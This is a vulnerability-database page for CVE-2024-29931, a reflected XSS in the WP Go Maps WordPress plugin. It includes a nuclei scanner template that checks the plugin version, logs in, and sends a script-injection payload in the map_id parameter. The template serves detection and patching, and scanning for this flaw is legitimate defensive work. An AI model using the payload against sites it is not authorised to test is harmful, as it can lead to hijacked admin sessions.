Lucene search
K

WP Go Maps <= 9.0.29 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

WP Go Maps before 9.0.30 has reflected XSS via map_id in the admin map edit page.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-29931
14 Feb 202510:03
circl
CNNVD
WordPress Plugin WP Go Maps 跨站脚本漏洞
27 Mar 202400:00
cnnvd
CVE
CVE-2024-29931
27 Mar 202410:10
cve
Cvelist
CVE-2024-29931 WordPress WP Go Maps plugin <= 9.0.29 - Reflected Cross Site Scripting (XSS) vulnerability
27 Mar 202410:10
cvelist
EUVD
EUVD-2024-26905
3 Oct 202520:07
euvd
NVD
CVE-2024-29931
27 Mar 202410:15
nvd
OSV
CVE-2024-29931
27 Mar 202410:15
osv
Patchstack
WordPress WP Go Maps Plugin <= 9.0.29 is vulnerable to Cross Site Scripting (XSS)
25 Mar 202400:00
patchstack
Positive Technologies
PT-2024-23155
27 Mar 202400:00
ptsecurity
RedhatCVE
CVE-2024-29931
5 Feb 202507:54
redhatcve
Rows per page
id: CVE-2024-29931

info:
  name: WP Go Maps <= 9.0.29 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    WP Go Maps (formerly WP Google Maps) plugin for WordPress versions before 9.0.30 is vulnerable to Reflected Cross-Site Scripting via the 'map_id' parameter in the admin map edit page.
  impact: |
    Attackers can execute arbitrary scripts in authenticated admin browsers, potentially leading to session hijacking, privilege escalation, WordPress admin account takeover, malicious plugin installation, and website defacement.
  remediation: |
    Update WP Go Maps plugin to version 9.0.30 or later.
  reference:
    - https://patchstack.com/database/wordpress/plugin/wp-google-maps/vulnerability/wordpress-wp-go-maps-plugin-9-0-29-reflected-cross-site-scripting-xss-vulnerability
    - https://wpscan.com/vulnerability/03c3e0ab-3373-4ba6-90fb-a5245b0af34e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29931
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-29931
    epss-score: 0.00753
    epss-percentile: 0.50558
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 4
    vendor: codecabin
    product: wp_go_maps
    framework: wordpress
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,wp-google-maps,wp-go-maps,authenticated,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-google-maps/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '<= 9.0.29')"
          - "contains(body, 'WP Go Maps') || contains(body, 'WP Google Maps')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1%27%3E%3C/a%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E%3Ca%20x%3D%27 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "</a><script>alert(document.domain)</script><a", "wp-google-maps")'
        condition: and
# digest: 490a0046304402203011f348bf336f9db947e329fefd8d4af95f1e39e347f78b8f59f4fc164f6594022071862c1cdded5e433d6724dac9d8a6a2f869b39482765a5dee21e9b359cb9c15:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.16.1 - 7.1
EPSS0.00753
SSVC
16